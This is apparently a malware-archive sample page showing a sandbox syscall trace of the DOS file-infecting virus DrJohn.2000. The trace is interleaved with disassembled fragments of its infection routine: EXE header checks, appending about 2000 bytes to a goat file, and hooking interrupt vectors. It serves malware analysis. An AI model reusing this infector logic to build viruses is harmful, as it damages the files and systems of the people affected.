Sample viewer

vx.netlux.org/Virus.DOS.DrJohn.2000

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:56:56.006197942Z 67 PC: 14317 | Get or set file attributes
2018-12-17T22:56:56.0130477Z 67 PC: 14324 | Get or set file attributes
2018-12-17T22:56:56.361355733Z 61 PC: 14329 | Open file (Filename = '). Size=00001770h/0000006000d bytes. $´ Í!ÃZèõÿ´0Í!<rLè±')
2018-12-17T22:56:56.368620922Z 42 PC: 14332 | Get date 0x14332: mov byte ptr cs:[0x13e], dh
0x14337: mov ax, 0x5700
0x1433a: int 0x21
0x1433c: mov word ptr cs:[0x132], dx
0x14341: mov word ptr cs:[0x134], cx
0x14346: xor cx, cx
0x14348: mov ds, cx
0x1434a: mov ah, 0x78
0x1434c: push cs
0x1434d: pop ds
0x1434e: mov ah, 0x3f
0x14350: mov cx, 0x1a
0x14353: mov dx, 0x658
0x14356: int 0x21
0x14358: mov ax, word ptr cs:[0x658]
0x1435c: cmp ax, 0x4d5a
0x1435f: jne 0x14364
0x14361: jmp 0x14530
0x14364: cmp ax, 0x5a4d
0x14367: jne 0x1436c
2018-12-17T22:56:56.372932749Z 87 PC: 1433c | Get or set file date and time
2018-12-17T22:56:56.376468356Z 63 PC: 14358 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:56:56.382274392Z 66 PC: 1438f | Move file pointer
2018-12-17T22:56:56.384985058Z 63 PC: 1439a | Read file or device (Read 16 bytes on handle 5)
2018-12-17T22:56:56.392850095Z 66 PC: 143ae | Move file pointer
2018-12-17T22:56:56.394925387Z 66 PC: 14402 | Move file pointer
2018-12-17T22:56:56.397446427Z 64 PC: 14417 | Write file or device (Write 1989 bytes on handle 5)
2018-12-17T22:56:56.40914958Z 66 PC: 14425 | Move file pointer
2018-12-17T22:56:56.41124Z 64 PC: 1442f | Write file or device (Write 10 bytes on handle 5)
2018-12-17T22:56:56.415154871Z 67 PC: 14544 | Get or set file attributes
2018-12-17T22:56:56.439635116Z 87 PC: 14553 | Get or set file date and time
2018-12-17T22:56:56.446386208Z 62 PC: 14557 | Close file
2018-12-17T22:56:56.454110972Z 42 PC: 12e2b | Get date 0x12e2b: cli
0x12e2c: cmp byte ptr cs:[0x13e], dh
0x12e31: je 0x12e4b
0x12e33: les cx, ptr [0x24]
0x12e37: mov word ptr cs:[0x1e3], cx
0x12e3c: mov word ptr cs:[0x1e5], es
0x12e41: mov ax, 0x4a8
0x12e44: mov word ptr [0x24], ax
0x12e47: mov word ptr [0x26], cs
0x12e4b: les cx, ptr [0x4c]
0x12e4f: mov word ptr cs:[0x1e7], cx
0x12e54: mov word ptr cs:[0x1e9], es
0x12e59: mov ax, 0x4d2
0x12e5c: mov word ptr [0x4c], ax
0x12e5f: mov word ptr [0x4e], cs
0x12e63: les cx, ptr [0x84]
0x12e67: mov word ptr cs:[0x1eb], cx
0x12e6c: mov word ptr cs:[0x1ed], es
0x12e71: mov ax, 0x1ef
0x12e74: mov word ptr [0x84], ax
2018-12-17T22:56:56.462609971Z 74 PC: 12e85 | Reallocate memory
2018-12-17T22:56:56.465719697Z 73 PC: 12ecb | Release memory
2018-12-17T22:56:56.467538707Z 75 PC: 12ee1 | Execute program
2018-12-17T22:56:56.485195394Z 9 PC: 13496 | Display string (String= 'Goat file (COM/k...). Size=00001770h/0000006000d bytes. ')
2018-12-17T22:56:56.502232595Z 48 PC: 1349f | Get DOS version
2018-12-17T22:56:56.503946998Z 67 PC: 12ba7 | Get or set file attributes
2018-12-17T22:56:56.510712959Z 67 PC: 12bb4 | Get or set file attributes
2018-12-17T22:56:56.527884593Z 61 PC: 12bb9 | Open file (Filename = '')
2018-12-17T22:56:56.537148941Z 42 PC: 12bc2 | Get date 0x12bc2: mov byte ptr cs:[0x13e], dh
0x12bc7: mov ax, 0x5700
0x12bca: int 0x21
0x12bcc: mov word ptr cs:[0x132], dx
0x12bd1: mov word ptr cs:[0x134], cx
0x12bd6: xor cx, cx
0x12bd8: mov ds, cx
0x12bda: mov ah, 0x78
0x12bdc: push cs
0x12bdd: pop ds
0x12bde: mov ah, 0x3f
0x12be0: mov cx, 0x1a
0x12be3: mov dx, 0x658
0x12be6: int 0x21
0x12be8: mov ax, word ptr cs:[0x658]
0x12bec: cmp ax, 0x4d5a
0x12bef: jne 0x12bf4
0x12bf1: jmp 0x12dc0
0x12bf4: cmp ax, 0x5a4d
0x12bf7: jne 0x12bfc
2018-12-17T22:56:56.540670572Z 87 PC: 12bcc | Get or set file date and time
2018-12-17T22:56:56.542802831Z 63 PC: 12be8 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:56:56.546013798Z 66 PC: 12c1f | Move file pointer
2018-12-17T22:56:56.552794957Z 63 PC: 12c2a | Read file or device (Read 16 bytes on handle 5)
2018-12-17T22:56:56.556729675Z 67 PC: 12dd4 | Get or set file attributes
2018-12-17T22:56:56.567545199Z 87 PC: 12de3 | Get or set file date and time
2018-12-17T22:56:56.569451012Z 62 PC: 12de7 | Close file
2018-12-17T22:56:56.578031745Z 61 PC: 1356c | Open file (Filename = '')
2018-12-17T22:56:56.585522659Z 93 PC: 1350e | File sharing functions
2018-12-17T22:56:56.587915497Z 9 PC: 13496 | Display string (String= 'Size change=07D0h/02000d. ')
2018-12-17T22:56:56.593279252Z 76 PC: 134f3 | Terminate with return code (Return code = '1')
2018-12-17T22:56:56.596804169Z 77 PC: 12ee5 | Get program return code
2018-12-17T22:56:56.598448119Z 76 PC: 12ea6 | Terminate with return code (Return code = '0')